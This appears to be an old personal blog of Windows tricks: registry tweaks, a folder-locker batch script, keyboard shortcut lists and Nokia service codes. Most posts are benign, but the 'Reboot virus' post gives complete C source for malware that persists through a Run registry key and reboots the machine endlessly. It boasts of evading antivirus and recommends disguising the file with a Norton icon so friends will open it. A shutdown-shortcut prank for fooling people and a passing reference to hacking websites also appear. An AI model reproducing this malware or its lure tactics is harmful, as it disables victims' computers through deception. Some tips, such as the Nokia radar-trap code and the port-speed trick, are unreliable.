Friday, July 10, 2009

More tips

Add Your Name (or) Application to right click Of My Computer
Caution ..
As it is related to Windows regisrty it can be dangerous
so,Try This at ur own risk


To write your name on right click application
please follow the steps.

1.Copy/Paste the following code in Notepad And then Save it as .reg

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Your Name Or Name of the Application"
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"

2.Now edit it and then Type your name In

Eg:

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor]
@="Rajesh"

3. If u want to get any application, once you click Your name or name of application
Then , Type the location Of the application Which u want to open In:

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Location Of The Application"

For eg.C:\Program Files\Yahoo!\Messenger\messenger.exe
Thats It finally save it And then Run it .














------------------------------------------------------------
To add Application Control Panel

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"

To add Application Add/Remove

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove\command]
@="control appwiz.cpl"

To add Application Reboot

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"

To add Application Shutdown

[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command]
@="shutdown -s -f -t 5"








Tips to recover scratched CD's
1. Spread a cloth on a flat surface and place the CD on it.
2. Then, hold the disc with one hand, use the other to wipe the polish into the affected area with a soft cloth.
3. Wait for it to dry and buff using short, brisk strokes along the scratch, not across it.
4. A cloth sold to wipe spectacles or camera lenses will work super m8's.
5. When you can no longersee the scratch,, wash the disc with water and let it dry before playing. Intersting isnt it? Try it right now
I have used toothpaste with good effects before Ive also used car paint cutting compound on deeper scratches. It does leave lots of smaller scratches (as it is a cutting compound after all) but it will remove the worst scratches in most cases.
ya u r gng to b surely befinited by this Operation

* Fingermarks/prints cause 43% of disc problems!
* General wear & tear causes 25% of disc problems!
* Player-related issues cause 15% of disc problems!
* Remaining Others

















Does When u Double click on Drive... New Window opens?

Whenever ppl double-click on any folder in Computer,

it opens in a new window even if selected the option “Always open folders in same window” in “Tools -> Folder Options”.
For this kind of Problem

Download following zip file, extract it and then run .REG file and confirm the action:


















for enabling Folder option
Many times Windows users face a common problem. The “Folder Options” in “Tools” menu is not visible. Even It can’t be accessed from Control Panel. Also “Registry Editor” is disabled.
Follow the simple steps mentioned in this tutorial and your problem will be solved:

1. If Folder Options is disabled but Registry Editor is still working in your system, then you can enable Folder Options by editing Windows Registry.
Type regedit in RUN dialog box and press Enter.
it’ll open Registry Editor, now go to following keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\ExplorerHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Policies\Explorer
In right-side pane, check whether a DWORD value named NoFolderOptions exists or not? If it exists, delete it.

2. If you are not familiar with editing the registry, then you can simply download following file, extract it and then run the .REG file:
Folder_option.zip
















................................................................................................................
If u cant run regedit ....
Seems like your system is infected with a virus. Pls follow following link:
http://www.askvg.com/is-your-system-infected-with-a-virus-spyware-adware-trojan/











..................................................................................................................
Some ppl find that "show hidden files and folders" option ll not b enabled..
though enabled they cant c the hidden folders...
for that dont worry
--open RUN
--type regedit
--HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Explorer\Advanced
And in right-side pane, change value of “Hidden” to 1 and refresh My Computer window and you’ll be able to see hidden files again
Posted by Rajesh
at 2:32 PM
Links to this post

chating without messenger:::: online

www.ebuddy.co.uk
www.koolim.com

diable user a/c control in vista

you can disable UAC by using one of the following methods:

Method #1 - Using MSCONFIG

  1. Launch MSCONFIG by from the Run menu.
  2. Click on the Tools tab. Scroll down till you find "Disable UAC" . Click on that line.
    MSCONFIG - Disable Account Protection
  3. Press the Launch button.
  4. A CMD window will open. When the command is done, you can close the window.
  5. Close MSCONFIG. You need to reboot the computer for changes to apply.

You can re-enable UAC by selecting the "Enable UAC" line and then clicking on the Launch button.







Method #2 - Using Regedit

  1. Open Registry Editor.
  2. In Registry Editor, navigate to the following registry key:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
  3. Locate the following value (DWORD): EnableLUA and give it a value of 0.
    Regedit - Disable UAC
  4. Note: As always, before making changes to your registry you should always make sure you have a valid backup. In cases where you're supposed to delete or modify keys or values from the registry it is possible to first export that key or value(s) to a .REG file before performing the changes.

  5. Close Registry Editor. You need to reboot the computer for changes to apply.

In order to re-enable UAC just change the above value to 1.


Reboot virus

Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect's this as a virus.I have coded this virus in C.So if you are familiar with C language then it's too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],"rb"); //The virus file open's itself
switch(drive_no)
{
case 1:
target=fopen("C:\\windows\\system\\sysres.exe","wb"); //to place a copy of itself in a remote place
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup
break;

case 2:
target=fopen("D:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe");
break;

case 3:
target=fopen("E:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe");
break;

case 4:
target=fopen("F:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe");
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the source code here
2. The downloaded file will be Sysres.C
3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)
4. The resulting .exe file is a virus and once you execute it will infect the system.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name "sres".Delete this entry.That's it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don't explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I'll explain the logic in a simplified manner.Here I'll not explain the technical details of the program.If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file's icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it's ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

Dos;; hide files

go to dos....
then wich drive you want go thre
example(abc is the name of folder)

D:\>attrib +h +s abc
the above command is to hide the folder

to show the folder

D:\>attrib -h -s abc

multiple yahoo

Want to Run multiple yahoo messengers in same pc..
Go to Run command by clicking Start Menu

Type Regedit

Expand HKEY_CURRENT_USER
Expand Software
Expand Yahoo
Expand Pager
Expand Test

Right Click on the Right Side pane of Registry Editor.

Click Dword in popup Menu
Enter the Name Plural

There will be a key defined with a value Nothing
Double Click the Plural and Enter the value 00000001

Now You can Run multiple yahoo messengers in same pc

Example is given below

[HKEY_CURRENT_USER\Software\yahoo\pager\Test]
"Plural"=dword:00000001

shutdown virus

create a shut down virus in ur computer

right click the desktop
select new and then shortcut

then specify the path of the shortcut
%windir%\system32\shutdown.exe -s -t 10


10 here is the time in seconds after which the system will shut down
now if u need to fool peolples just change the icon of the shortcut created and to any of the icon similar on ur desktop....
ehrn the icon will be clicked boooooomm!!!!!!!!!!!!!!

Send to option

As we all know about "Send To" menu which appears when we right-click on a file or folder in
Windows Explorer. It contains some useful items like "Desktop (create shortcut)" which can create
a shortcut of the selected file/folder on Desktop within a few seconds. Its really a useful option.


But sometimes this item gets deleted from "Send To" menu accidentally or intentionally.
Following tutorial will help you in restoring this useful item back in "Send To" menu:

METHOD A:

1. Type "shell:sendto" in RUN dialog box and press Enter. It'll open "Send To" folder.

2. Now right-click on blank area in the folder and select "New -> Text document". It'll create a
text file with the name "New Text Document.txt". Rename this file
and set its name to "Desktop (create shortcut).DeskLink".

3. That's it. Now you'll get "Desktop (create shortcut)" option back in "Send To" menu.

NOTE: Make sure "Hide extensions for known file types" option is disabled in "Folder Options",
otherwise the second step might not work and the text file will not convert in desktop shortcut item.



METHOD B:

This method will only work in Windows XP. It'll not work in Vista and 7:

1. Type following command in RUN dialog box:

regsvr32 sendmail.dll

2. It'll re-create the missing "Desktop (create shortcut) option in "Send To" menu.

Nokia keys

*NOKIA*

ON THE MAIN SCREEN TYPE
1> *#06# -> To see IMEI (international mobile equipment identity)

2> *#7780# ->To reset mobile on factory setting

4>*#67705646# ->This will clear LCD display(Operator logo)

5>*#0000# -> To view software version

6>*#2820# ->Bluetooth device address

7>*#746025625# -> Sim clock allowed status

8>#pw+1234567890+1# -> Shows if sim have restrictions

9>*#92702689# -> Take u to secret menu that gives following information
1.Serial number
2.Month & Year of manufacture
3.Date of purchasing mobile(if there) in MMYY format
4.Date of last repair
5.Shows life timer of phone

10>*#3370# ->Enhanced Full Rate Code(EFR) Activation.Increase signal strength,and GPRS speed but
low down battry backup by 30%

11>*#3370# -> Deactivate EFR.

12>*#4720# ->Half Code Rate activation

13>*#4720# ->Half code deactivation

14>*#7370925538# ->If u forget wallet code this will reset the code (NOTE: ur data in the wallet will
be erased).Phon will ask for lock code Default lock code is 12345

15>*#3925538# -> Delet the content and code of wallet

16>UNLOK SERVICE PROVIDER : Insert sim,turn on phone and press volume p(arrow key) for 3 sec ,
should say pin code.Press C,then press * message should flash press
* again and 04*pin*pin*pin#
17> *#73287482633738# :Reset security code . Default code is 12345

18> CHANGE CLOSED CALLER GROUP :(setting-security setting-user group) To 0000 and ure phone will
sound the message tone when u r near radar trap.setting it to
500 set off security alarms at shop exits(work with some of the
NOKIA phone.
12/1/06

Multiple gtalk

multiple gtalk with out any software
Gtalk trick-How to open Multiple gtalk windows???

1. Right-click GTalk shortcut and select Properties.

2. The shortcut properties dialog box as shown below should popup.

3. Just add /nomutex to the existing text Eg: "C:\Program Files\Google\Google Talk\googletalk.exe"/nomutex


and if you see like this "C:\Program Files\Google\Google Talk\googletalk.exe"/startmenu

then just avoid that start menu and add nomutex okies

then it will works.......

4. Now you can launch multiple windows and use different ID's.

Make ur locker

locker bro................



cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"

if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


now go for following few steps
1>copy above program into notepad.
2>the text which is written in bold letters delete it & type your password there.
3>save that file by extension .bat ( name is Your choice)
4>now on Your screen there is a bat file appear.
5>double click on that file.
6>you will see the locker folder.
7>save the files in that folder.
8>double click on that folder & lock that folder
9>after locking that folder it will become hidden.
10>to open that folder double click on that bat file
11>type your password & open that folder..

block orkut on pc

If u have enabled the do not show hidden folders then enable it and now,

Open my computer ---> windows ----> system32 ---->

drivers -----> etc -----> hosts

now right click the hosts file and open it in notepad

u will see the tcp/ip details in this file now below the last line ie. 127.0.0.1 local host

type 127.0.0.2 www.orkut.com

thats it u r done u can type any site name but be careful n dont do anything else to the hosts file.
Now similarly if u wanna unblock the site delete the written line dats it.

speed up internet

increse ur internet Speed by another tricks
follow the step:-
go to desktop->My computer-(right click on)->properties->then go HARDWARE tab->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

apply and see the result
and please comment me.........

hide hard disk

How to hide ur hard disk!
In run type 'diskpart' thn after cmd prmpt is open.
Thn type 'list volume' and hit enter.List of volume will appears.Then type
'select volume 3' or any a msg prompt volume 3 is selected.Then type 'remove
letter f' nr any in ur volume thts no is 3 press enter.Ur hardisk will hide.To
assign again ur hard disk reapt all that command
bt instead of 'remove' use 'assign letter f' ur hard disk will come
again in front of u..


To lock your desktop with just two mouse clicks. (Windows XP)

To lock your XP works-tation with just two clicks of the mouse. First
create a new shortcut on your desktop using a right mouse click,
and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field.
Name the shortcut whatever you like. Then just double click on it and your
computer will be instantly locked. The Windows key + L also does the same
thing.




To lock your desktop with just two mouse clicks. (Windows XP)

To lock your XP works-tation with just two clicks of the mouse. First create
a new shortcut on your desktop using a right mouse click,
and enter 'rundll32.exe user32.dll,LockWorkStation' in the location
field. Name the shortcut whatever you like. Then just double click on
it and your computer will be instantly locked. The Windows key + L also does
the same thing.










Monday, May 19, 2008
How to Rename the Recycle Bin

To change the name of the Recycle Bin desktop icon, open Regedit and go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}

and change the name "Recycle Bin" to whatever you want (don't type any quotes).


















Hide ur drives || Lock ur drives

Open Registry (go to run command, type "regedit" and press enter)
then go to this key

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer

now right click in right side pane and create DWORD Value (blue color)
Rename it as "NoViewOnDrive" (for locking drive)
or
Rename it as "NoDrives" (for Hiding drive)
double click on it and put some numbers to lock ur desired Drive and click ok.

DRIVE NOS.
FOR A : 1
FOR C : 4
FOR D : 8
FOR E : 16
FOR F : 32
FOR G : 64
FOR H : 128

finally restart or log-off the computer to take effect.
Keep in mind that "0" is Default Value to Disable or remove this setting..
After locking the drive when u try to open it, u will see a msgbox like this
"This operation has been cancelled due to restrictions in effect
on this computer. Please contact
your system administrator"

















Monday, May 19, 2008
How to Rename the Recycle Bin

To change the name of the Recycle Bin desktop icon, open Regedit and go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}

and change the name "Recycle Bin" to whatever you want (don't type any quotes).

Change ur ip address

How To: Change Your Ip In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Shortcuts key

1.) Windows Hotkeys

* Shift + F10 right-clicks.
* Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
* Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
* Win + Control + F: Open Find dialog. (Computers)
* Win + U: Open Utility Manager.
* Win + F1: Open Windows help.
* Win + Pause: Open System Properties dialog.
* Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
* Win + Shift + Tab: Cycle through taskbar buttons in reverse.
* Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog.
* Alt + Shift + Tab: Display CoolSwitch; go in reverse.
* Alt + Escape: Send active window to the bottom of the z-order.
* Alt + Shift + Escape: Activate the window at the bottom of the z-order.
* Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
* Shift while a CD is loading: Bypass AutoPlay.
* Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
* Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
* Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
* Printscreen: Copy screenshot of current screen to clipboard.
* Alt + Printscreen: Copy screenshot of current active window to clipboard.
* Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.
* Ctrl + Alt + Up Arrow: Undo inversion.
* Win + B : Move focus to systray icons.

2.) Generic



* Ctrl + C or Ctrl + Insert: Copy.
* Ctrl + X or Shift + Delete: Cut.
* Ctrl + V or Shift + Insert: Paste/Move.
* Ctrl + N: New... File, Tab, Entry, etc.
* Ctrl + S: Save.
* Ctrl + O: Open...
* Ctrl + P: Print.
* Ctrl + Z: Undo.
* Ctrl + A: Select all.
* Ctrl + F: Find...
* Ctrl+W : to close the current window
* Ctrl + F4: Close tab or child window.
* F1: Open help.
* F11: Toggle full screen mode.
* Alt or F10: Activate menu bar.
* Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
* Escape: Remove focus from current control/menu, or close dialog box.


3.) Generic Navigation


* Tab: Forward one item.
* Shift + Tab: Backward one item.
* Ctrl + Tab: Cycle through tabs/child windows.
* Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
* Enter: If a button's selected, click it, otherwise, click default button.
* Space: Toggle items such as radio buttons or checkboxes.
* Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
* Ctrl + Left: Move cursor to the beginning of previous word.
* Ctrl + Right: Move cursor to the beginning of next word.
* Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls.
* Ctrl + Down: Move cursor to beginning of next paragraph.
* Shift + Left: Highlight one character to the left.
* Shift + Right: Highlight one character to the right.
* Shift + Up: Highlight from current cursor position, to one line up.
* Shift + Down: Highlight from current cursor position, to one line down.
* Ctrl + Shift + Left: Highlight to beginning of previous word.
* Ctrl + Shift + Right: Highlight to beginning of next word.
* Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
* Ctrl + Shift + Down: Highlight to beginning of next paragraph.
* Home: Move cursor to top of a scrollable control.
* End: Move cursor to bottom of a scrollable control.


4.) Generic File Browser


* Arrow Keys: Navigate.
* Shift + Arrow Keys: Select multiple items.
* Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
* (Letter): Select first found item that begins with (Letter).
* BackSpace: Go up one level to the parent directory.
* Alt + Left: Go back one folder.
* Alt + Right: Go forward one folder.
* Enter: Activate (Double-click) selected item(s).
* Alt + Enter: View properties for selected item.
* F2: Rename selected item(s).
* Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
* Delete: Delete selected item(s).
* Shift + Delete: Delete selected item(s); bypass Recycle Bin.
* Ctrl while dragging item(s): Copy.
* Ctrl + Shift while dragging item(s): Create shortcut(s).
* In tree pane, if any:
* Left: Collapse the current selection if expanded, or select the parent folder.
* Right: Expand the current selection if collapsed, or select the first subfolder.
* NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo.
* NumpadPlus: Expand currently selected directory.
* NumpadMinus: Collapse currently selected directory.


5.) Accessibility


* Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
* Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
* Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
* NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
* Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
* 6.) Microsoft Natural Keyboard with IntelliType Software Installed
* Win + L: Log off Windows.
* Win + P: Open Print Manager.
* Win + C: Open control panel.
* Win + V: Open clipboard.
* Win + K: Open keyboard properties.
* Win + I: Open mouse properties.
* Win + A: Open Accessibility properties.
* Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
* Win + S: Toggle CapsLock on and off.


7.) Remote Desktop Connection Navigation


* Ctrl + Alt + End: Open the NT Security dialog.
* Alt + PageUp: Switch between programs.
* Alt + PageDown: Switch between programs in reverse.
* Alt + Insert: Cycle through the programs in most recently used order.
* Alt + Home: Display start menu.
* Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
* Alt + Delete: Display the Windows menu.
* Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
* Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.


8.) Mozilla Firefox Shortcuts


* Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
* Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
* Ctrl + (1-9): Switch to tab corresponding to number.
* Ctrl + N: New window.
* Ctrl + T: New tab.
* Ctrl + L or Alt + D or F6: Switch focus to location bar.
* Ctrl + Enter: Open location in new tab.
* Shift + Enter: Open location in new window.
* Ctrl + K or Ctrl + E: Switch focus to search bar.
* Ctrl + O: Open a local file.
* Ctrl + W: Close tab, or window if there's only one tab open.
* Ctrl + Shift + W: Close window.
* Ctrl + S: Save page as a local file.
* Ctrl + P: Print page.
* Ctrl + F or F3: Open find toolbar.
* Ctrl + G or F3: Find next...
* Ctrl + Shift + G or Shift + F3: Find previous...
* Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
* Ctrl + H: Open History sidebar.
* Escape: Stop loading page.
* Ctrl + R or F5: Reload current page.
* Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
* Ctrl + U: View page source.
* Ctrl + D: Bookmark current page.
* Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
* Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
* Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
* Alt + Left or Backspace: Back.
* Alt + Right or Shift + Backspace: Forward.
* Alt + Home: Open home page.
* Ctrl + M: Open new message in integrated mail client.
* Ctrl + J: Open Downloads dialog.
* F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
* Shift + F6: Switch to previous frame.
* Apostrophe ('): Find link as you type.
* Slash (/): Find text as you type.


9.) GMail


* Note: Must have "keyboard shortcuts" on in settings.
* C: Compose new message.
* Shift + C: Open new window to compose new message.
* Slash (/): Switch focus to search box.
* K: Switch focus to the next most recent email. Enter or "O" opens focused email.
* J: Switch focus to the next oldest email.
* N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
* P: Switch focus to the previous message.
* U: Takes you back to the inbox and checks for new mail.
* Y: Various actions depending on current view:
* Has no effect in "Sent" and "All Mail" views.
* Inbox: Archive email or message.
* Starred: Unstar email or message.
* Spam: Unmark as spam and move back to "Inbox."
* Trash: Move back to "Inbox."
* Any label: Remove the label.
* X: "Check" an email. Various actions can be performed against all checked emails.
* S: "Star" an email. Identical to the more familiar term, "flagging."
* R: Reply to the email.
* A: Reply to all recipients of the email.
* F: Forward an email.
* Shift + R: Reply to the email in a new window.
* Shift + A: Reply to all recipients of the email in a new window.
* Shift + F: Forward an email in a new window.
* Shift + 1 (!): Mark an email as spam and remove it from the inbox.
* G then I: Switch to "Inbox" view.
* G then S: Switch to "Starred" view.
* G then A: Switch to "All Mail" view.
* G then C: Switch to "Contacts" view.
* G then S: Switch to "Drafts" view.



10.) List of F1-F9 Key Commands for the Command Prompt


* F1 / right arrow: Repeats the letters of the last command line, one by one.
* F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
* F3: Repeats the last command line
* F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
* F5: Goes back one command line
* F6: Enters the traditional CTRL+Z (^z)
* F7: Displays a menu with the command line history
* F8: Cycles back through previous command lines (beginning with most recent)
* F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
* Alt+Enter: toggle fullScreen mode.
* up/down: scroll thru/repeat previous entries
* Esc: delete line
* Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.



CUT ACROSS WITH THE KEYBOARD SHORTCUTS
USING THE MOUSE IS EASY, BUT IF YOU REALLY WANT TO WORK ON YOUR PC LIKE A PRO, THESE KEYBOARD SHORTCUTS GET YOU THERE......

SR.NO.
SHORT CUT KEYS
USE
FOR WINDOWS AND ITS PROGRAMS




1.
Help
2. F2 Rename an item
3. F3 Open files
4. ALT+F4 Close window or quit program
5. F10 Activate the menu bar in a program
6. CTRL+ ESC open start menu, use the arrow keys to select an item, or TAB to select the taskbar
7. ALT+ TAB Return to previous program, or hold down the ALT key while repeatedly pressing tab to cycle through open programs
8. SHIFT+ DEL delete items permanently without sending to recycle bin
9. CTRL+ A Highlight all the items in window
10. CTRL+ C Copy
11. CTRL+ X Cut
12. CTRL+ V Paste
13. CTRL+ Z Undo
14. CTRL+ Y Redo
FOR INTERNET EXPLORER AND NETSCAPE
15. Home Jumps to the beginning of the page
16. END Jumps to the end of the page
17. ESC Stops the current page from loading
18. F11 Toggles full screen view
19. ALT+ LEFT ARROW Goes back to the previous page
20. ALT+ RIGHT ARROW Goes forward to the next page
21. ALT+ Home Goes to your Home page
22. CTRL+ N Opens a new browser window
23. CTRL+ W Closes the active window
24. CTRL+ O Opens the address book
25. CTRL+ R Reloads the current page
26. CTRL+ B Opens the Organized Favorites or Bookmarks windows
27. CTRL+ D Add the current page to your Favorites or Bookmarks
28. CTRL+ H Opens the history folder
29. CTRL+ F Finds text on the current page


CONTROL OVER A TO Z
